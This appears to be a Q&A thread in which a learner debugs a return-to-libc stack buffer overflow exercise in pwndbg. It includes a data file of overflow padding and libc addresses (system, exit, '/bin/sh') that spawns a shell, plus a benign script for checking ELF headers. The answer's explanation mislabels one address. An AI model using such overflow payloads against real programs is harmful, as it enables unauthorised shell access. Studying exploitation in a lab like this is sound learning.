
I am learning stack buffer overflow in return-to-libc.

The code reads addresses from a file (as a char array), saves them in a

    uint32_t array[5]

and tries to open a "/bin/sh" shell over the existing one.

I have two issues. I use GDB's pwndbg in Kali Linux:

  1. When I cause the overflow using characters like 'A' in sets of 4 bytes (as uint32_t is 4 bytes), it reaches the address of "/bin/sh", even shows it, and then gives a segfault. (I can share the pwndbg output screen.)
  2. When I use integers (4 bytes each) to cause the overflow, it starts the shell and then gives

ERROR: Could not find ELF base!

The complete error is:

    Starting program: /some address/ data.txt
    .txt file contains:
    1
    2
    3
    4
    5
    f7f00123
    2
    f7e00124
    1
    f2e00100

    Sorted list in ascending order:
    1
    1
    2
    2
    3
    4
    5
    f2e00100
    f7e00124
    f7f00123
    [Attaching after process 11528 vfork to child process 11529]
    [New inferior 2 (process 11529)]
    [Detaching vfork parent process 11528 after child exec]
    [Inferior 1 (process 11528) detached]
    process 11529 is executing new program: /usr/bin/dash
    ERROR: Could not find ELF base!
    [Inferior 2 (process 11529) exited normally]

Since I am treating the file reading and storing as the vulnerable process for the overflow, I believe the sorted data has no consequence.

My addresses are as follows:

    f7f00123 - "/bin/sh"
    f2e00100 - system
    f7e00124 - exit

Also, to check that the address is correct:

    pwndbg> display /s f7f00123
    1: x/s 0xf7f00123 0xf7f00123:  "/bin/sh"

Please help me identify why it's not opening the shell.

  • Please can you add the tag `pwndbg` to this question, if this tag already exists? The error message "ERROR: Could not find ELF base!" is `pwndbg` specific, not a `gdb` error message. In the source of `pwndbg` this is shown when you try to execute a non-ELF file. `pwndbg` checks here the beginning (magic) of the file. `pwndbg` wants to execute `/usr/bin/dash`, which seems not to be an ELF binary. – Sep 10 '21 at 04:57
  • I did not get any tag as pwndbg, so did not add it. – VMi Sep 10 '21 at 05:07
  • You can check out [Teacher request: remove homework questions](https://meta.stackexchange.com/q/270605/209031) for further assistance. – KyleMit Feb 04 '22 at 14:25
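The check the pwndbg comment describes, as an added stand-alone example (my code, not pwndbg's): it reads the ELF identification bytes and the file-header type so you can confirm on your own machine whether a path such as /usr/bin/dash is an ELF binary at all. The two sample headers are constructed inline; the script also accepts a real path as its first argument.

```python
import struct
import sys

ELF_MAGIC = b"\x7fELF"
E_TYPES = {1: "ET_REL", 2: "ET_EXEC", 3: "ET_DYN", 4: "ET_CORE"}

def describe_elf(header: bytes) -> dict:
    """Classify the first bytes of a file the way a debugger plugin must before it
    can look for an ELF base: magic, class, byte order, e_type and e_entry."""
    if len(header) < 24 or header[:4] != ELF_MAGIC:
        return {"is_elf": False, "reason": "no \\x7fELF magic at offset 0"}
    ei_class, ei_data = header[4], header[5]   # 1 = 32-bit / little, 2 = 64-bit / big
    if ei_class not in (1, 2) or ei_data not in (1, 2):
        return {"is_elf": False, "reason": "bad EI_CLASS or EI_DATA"}
    endian = "<" if ei_data == 1 else ">"
    # e_ident occupies bytes 0..15; e_type is the 16-bit field right after it
    (e_type,) = struct.unpack_from(endian + "H", header, 16)
    # e_entry sits at offset 24 and is 4 bytes for ELFCLASS32, 8 for ELFCLASS64
    fmt = "I" if ei_class == 1 else "Q"
    if len(header) < 24 + struct.calcsize(fmt):
        return {"is_elf": False, "reason": "truncated ELF header"}
    (e_entry,) = struct.unpack_from(endian + fmt, header, 24)
    return {
        "is_elf": True,
        "bits": 32 if ei_class == 1 else 64,
        "endian": "little" if ei_data == 1 else "big",
        "e_type": E_TYPES.get(e_type, f"unknown({e_type})"),
        "e_entry": e_entry,
    }

def check_file(path: str) -> dict:
    """Read just the header of a file on disk and classify it."""
    with open(path, "rb") as f:
        return describe_elf(f.read(64))

# Constructed samples (not real files): a minimal 32-bit little-endian ET_DYN
# header with e_machine=3 (EM_386) and e_entry=0x1060, and a plain shell script.
SAMPLE_ELF32 = (ELF_MAGIC + bytes([1, 1, 1, 0]) + b"\x00" * 8
                + struct.pack("<HHII", 3, 3, 1, 0x1060))
SAMPLE_SCRIPT = b"#!/bin/sh\necho not an ELF\n"

if __name__ == "__main__":
    if len(sys.argv) > 1:
        print(sys.argv[1], check_file(sys.argv[1]))
    print("sample ELF32:", describe_elf(SAMPLE_ELF32))
    print("sample script:", describe_elf(SAMPLE_SCRIPT))
```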

1 Answer

OK, found the solution.

The stack buffer overflow isn't happening above. The exit function won't work because when the data is sorted, it is placed above system. So the final data in data.txt will be:

    aaaa
    bbbb
    cccc
    dddd
    eeee
    ffff
    ffff
    f7f00123
    f7e00124
    f2e00100
    f7f00123

Instead of

    address -> 23456789

which corresponds to exit, I changed it to

    address -> f7f00123

which corresponds to exit.

So now, after the file is read, a shell is spawned, and when I type exit, it exits cleanly.
